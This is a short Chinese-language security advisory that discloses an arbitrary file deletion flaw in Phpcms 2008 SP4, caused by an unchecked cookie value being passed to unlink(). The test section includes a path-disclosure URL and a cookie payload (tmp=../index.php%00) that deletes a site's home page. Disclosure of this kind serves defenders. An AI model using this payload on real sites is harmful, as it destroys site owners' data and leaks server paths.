受影响系统:
酷6网 Phpcms 2008 SP4
描述:
Phpcms网站管理系统是国内主流CMS系统之一。
corpandresize/config.inc.php中定义:
$tmp = $_COOKIE[‘tmp’];
define("TMP_PATH", $tmp);
在corpandresize/process.php中用到TMP_PATH,满足前面的一系列条件后:
76: @unlink(TMP_PATH.’/’.$thumbfile);
由于没有检查$_COOKIE[‘tmp’]就直接放入unlink()中,只要修改cookie就可以删除网站的任意文件。
<*来源:CnCxzSec
链接:http://www.wooyun.org/bug.php?action=view&id=412
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!注册用户登陆后访问
http://localhost/phpcms/corpandresize/process.php?pic=../images/logo.gif
此时泄露绝对路径
在cookie中添加一句(或修改原有值)tmp=../index.php%00即可删除首页文件
建议:
厂商补丁:
酷6网
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。